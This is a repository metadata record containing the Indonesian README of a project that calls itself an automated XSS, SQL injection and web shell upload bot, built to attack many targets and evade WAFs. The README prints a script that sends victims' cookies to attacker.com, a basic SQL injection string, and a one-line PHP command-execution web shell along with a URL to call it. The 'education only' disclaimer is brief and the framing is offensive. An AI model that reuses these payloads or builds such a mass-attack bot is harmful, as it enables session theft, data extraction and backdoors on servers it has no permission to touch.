{"id":26061683,"url":"https://github.com/cyberheroess/xss-sqli","last_synced_at":"2026-04-19T12:39:29.699Z","repository":{"id":281280648,"uuid":"944799600","full_name":"Cyberheroess/XSS-SQLI","owner":"Cyberheroess","description":"XSS + SQL Injection + Web Shell Upload Bot","archived":false,"fork":false,"pushed_at":"2025-03-08T02:09:41.000Z","size":0,"stargazers_count":1,"open_issues_count":0,"forks_count":0,"subscribers_count":1,"default_branch":"main","last_synced_at":"2025-03-08T02:26:32.113Z","etag":null,"topics":["sql-injection","sqlalchemy","sqlite","sqlite3","xss","xss-attacks","xss-detection","xss-exploitation","xss-scanner","xss-vulnerability"],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/Cyberheroess.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2025-03-08T01:45:02.000Z","updated_at":"2025-03-08T02:13:23.000Z","dependencies_parsed_at":"2025-03-08T02:36:36.206Z","dependency_job_id":null,"html_url":"https://github.com/Cyberheroess/XSS-SQLI","commit_stats":null,"previous_names":["cyberheroess/xss-sqli"],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Cyberheroess%2FXSS-SQLI","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Cyberheroess%2FXSS-SQLI/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Cyberheroess%2FXSS-SQLI/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Cyberheroess%2FXSS-SQLI/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/Cyberheroess","download_url":"https://codeload.github.com/Cyberheroess/XSS-SQLI/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":242566165,"owners_count":20150481,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["sql-injection","sqlalchemy","sqlite","sqlite3","xss","xss-attacks","xss-detection","xss-exploitation","xss-scanner","xss-vulnerability"],"created_at":"2025-03-08T15:13:06.513Z","updated_at":"2026-04-19T12:39:29.663Z","avatar_url":"https://github.com/Cyberheroess.png","language":"Python","funding_links":[],"categories":[],"sub_categories":[],"readme":"# XSS-SQLI\nXSS + SQL Injection + Web Shell Upload Bot\n---\n\n# **XSS + SQL Injection + Web Shell Upload Bot**  \n**Versi: 1.0**  \n\n## **📌 Tentang Script Ini**  \nScript ini adalah **bot sederhana** yang menggabungkan tiga teknik serangan web yang umum:  \n![17413997546818279413700194614756](https://github.com/user-attachments/assets/334b0168-6210-4f37-b99a-6ffbececf19b)\n\n1️⃣ **XSS (Cross-Site Scripting)** → Menyisipkan script berbahaya untuk mencuri **cookie/session** user.  \n2️⃣ **SQL Injection** → Mengeksploitasi celah SQL untuk mendapatkan **data sensitif** dari database.  \n3️⃣ **Web Shell Upload** → Mengunggah file shell untuk mendapatkan **akses penuh ke server**.  \n\n---\n\n## **⚙️ Cara Kerja Script**  \n✅ **User memasukkan target** (manual atau dari file).  \n✅ **Bot menjalankan serangan berurutan** (XSS → SQLi → Web Shell).  \n✅ **Jika SQL Injection berhasil**, lanjut **upload web shell** otomatis.  \n✅ **Serangan dilakukan dengan encoding canggih** untuk **bypass WAF**.  \n✅ **Menggunakan multi-threading** supaya bisa menyerang banyak target sekaligus.  \n\n---\n\n## **📂 Fitur Utama**  \n✔️ **XSS Payload terenkripsi** → Meminimalkan deteksi oleh WAF.  \n✔️ **Bypass WAF SQL Injection** → Menggunakan payload yang lebih stealth.  \n✔️ **Web Shell Upload** → Menyisipkan backdoor di server target.  \n✔️ **Bot otomatis multi-threading** → Bisa menyerang banyak target dalam waktu singkat.  \n✔️ **Error Handling** → Script tidak akan crash jika target mati atau tidak responsif.  \n\n---\n\n## **🚀 Cara Menggunakan**  \n### **1️⃣ Jalankan Script**  \n```bash\npython3 xss_sqli_shell.py\n```\n  \n### **2️⃣ Pilih Metode Input Target**  \n1️⃣ **Manual** → Masukkan URL target satu per satu.  \n2️⃣ **Dari File** → Masukkan daftar target dari file (`targets.txt`).  \n\n**Contoh format file `targets.txt`**  \n```\nhttp://victim.com/vuln.php?input=\nhttp://testsite.com/comment.php?msg=\n```\n\n---\n\n## **🔴 Contoh Serangan**  \n📌 **XSS Attack:**  \n```html\n\u003cscript\u003edocument.location='http://attacker.com/steal.php?cookie='+document.cookie\u003c/script\u003e\n```\n\n📌 **SQL Injection:**  \n```sql\n' OR 1=1--\n```\n\n📌 **Web Shell Upload:**  \n- Mengunggah file `shell.php` berisi:  \n```php\n\u003c?php system($_GET['cmd']); ?\u003e\n```\n- Setelah berhasil, akses shell:  \n```\nhttp://target.com/uploads/shell.php?cmd=whoami\n```\n\n---\n\n## **📌 Catatan**  \n🔹 Script ini **sederhana** dan hanya untuk **edukasi** tentang keamanan web.  \n🔹 Jangan digunakan untuk hal ilegal! Gunakan hanya di **sistem yang Anda miliki atau izin resmi**.  \n🔹 **Pastikan memahami konsep dasar keamanan web** sebelum menggunakan script ini.  \n\n---\n\n## **👨‍💻 Dibuat Oleh**  \n🛠️ **Cyber-Heroes** - Edukasi \u0026 Eksperimen Keamanan Web  \n---\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fcyberheroess%2Fxss-sqli","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fcyberheroess%2Fxss-sqli","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fcyberheroess%2Fxss-sqli/lists"}